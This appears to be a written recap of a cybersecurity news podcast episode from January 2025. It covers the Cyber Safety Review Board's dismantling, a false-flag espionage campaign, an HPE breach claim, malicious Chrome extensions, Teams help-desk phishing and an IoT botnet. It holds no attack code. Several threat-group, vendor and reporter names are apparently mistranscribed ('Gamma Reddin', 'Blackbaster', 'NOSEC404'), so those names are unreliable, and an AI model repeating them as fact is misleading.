Risky Bulletin: Trump Guts the Cyber Safety Review Board
Hosted by risky.biz | Release Date: January 21, 2025

Introduction

In this episode of Risky Bulletin, host Claire Aird delves into significant developments in the cybersecurity landscape, highlighting political shifts, emerging threats, and critical security breaches. Prepared by Catalyn Kimpanu, this edition covers the Trump administration's dismantling of the Cyber Safety Review Board, sophisticated cyber espionage tactics, notable security breaches involving major tech firms, malicious Chrome extensions, phishing strategies exploiting Microsoft Teams, and the emergence of a formidable IoT botnet.

1. President Trump Dismantles the Cyber Safety Review Board

Claire Aird opens the discussion with a major policy shift:

"[...] the Trump administration has removed all non-government members from all DHS committees, including the Cyber Safety Review Board." [00:20]

The Cyber Safety Review Board (CSRB), established in February 2022 with a 14-member panel, previously included prominent private sector figures such as Google's Heather Adkins, CrowdStrike co-founder Dmitri Alperovich, former NSA cybersecurity director Rob Joyce, and CISA's founding director Chris Krebs. The removal of these members signifies a substantial retreat from public-private collaboration in cybersecurity oversight.

Moreover, President Trump has rescinded an executive order initiated by President Biden in 2023, which mandated large AI companies to rigorously test their models to prevent significant societal risks. This reversal also entails the shutdown of the US AI Safety Institute, a move that critics argue undermines safeguards against the misuse of artificial intelligence.

2. Impersonation of the FSB by Gamma Copy Targets Russian Organizations

A sophisticated cyber espionage campaign has emerged, with a threat actor group known as Gamma Copy impersonating the Federal Security Service (FSB) to target Russian entities. Claire notes:

"A cyber espionage group has been imitating the FSB's TTPs to target Russian organisations." [00:45]

Gamma Copy mimics the tactics, techniques, and procedures (TTPs) of the Gamma group, a known FSB-affiliated cyber espionage unit operating from Crimea. Since June, these false flag attacks have led security vendors to incorrectly attribute incidents to Gamma Reddin, as reported by Chinese security firm NOSEC404. The spearphishing campaigns leverage military-related lures, aiming at individuals within Russia's defense and critical infrastructure sectors. Victims are deceived into downloading malicious 7-zip archive files, facilitating unauthorized access and data extraction.

3. HPE Investigates Alleged Data Breach by Intel Broker

High-performance computing giant HPE is currently probing a potential security breach:

"American tech giant HPE is investigating a possible security breach after a threat actor started advertising data allegedly stolen from its servers." [01:10]

The hacker, identified as Intel Broker, claims to have exfiltrated outdated user data and source code associated with HPE's Zerto and ILO products. Notably, Intel Broker was also responsible for breaching Cisco's DevHub portal in late 2024, indicating a pattern of targeted attacks against major technology firms.

4. Discovery of Malicious Chrome Extensions Bypassing Google's Security

Security researcher Vladimir Palant has uncovered a troubling trend in browser security:

"Security researcher Vladimir Palant has discovered 35 Chrome extensions that circumvent Google's restrictions and retrieve execute code from remote servers." [01:35]

These extensions masquerade as legitimate VPN and ad-blocking tools but are, in reality, designed to spy on users and engage in affiliate link fraud. Disturbingly, all 35 malicious extensions remain available on the official Chrome Web Store, posing significant risks to unsuspecting users.

5. Exploitation of Microsoft Teams for Phishing Attacks

Cybercriminals are exploiting vulnerabilities in Microsoft Teams to conduct targeted phishing campaigns:

"Threat actors are spamming workers at large corporations and then contacting the victim posing as their IT help desk." [01:55]

By leveraging misconfigurations within the Teams platform, attackers can call or message via email inside private workspaces, a technique initially deployed last year by ransomware affiliate Blackbaster. This method has since proliferated to other threat groups, including Fin7, enhancing the effectiveness and reach of phishing initiatives.

6. Emergence of the Murdoch IoT Botnet Launching Large-Scale DDoS Attacks

Qualys has identified a new Internet of Things (IoT) botnet named Murdoch responsible for executing extensive Distributed Denial of Service (DDoS) attacks:

"Qualys has identified a new IoT botnet that's carrying out large scale DDoS attacks. Named Murdoch, the botnet began operating in July of last year." [02:15]

The botnet exploits unpatched vulnerabilities in AVTech cameras and Huawei routers, capitalizing on flaws documented through open-source intelligence. Currently, Murdoch operates on approximately 1,000 devices, posing a significant threat to internet infrastructure stability.

Conclusion

Claire Aird wraps up the episode by emphasizing the dominance of President Trump in the current news cycle, impacting the episode's length:

"Just a short one today with Donald Trump absolutely dominating the news cycle. But we'll be back with more news in a couple of days when the agenda, well, hopefully goes back to business as usual." [02:40]

Listeners are assured of more comprehensive updates in future editions of the Risky Bulletin.

Sponsor

This episode of Risky Bulletin is sponsored by Resourcely, a company specializing in secure Terraform management. Discover more at resourcely.io.

Thank you for tuning into Risky Bulletin. Stay informed and stay secure.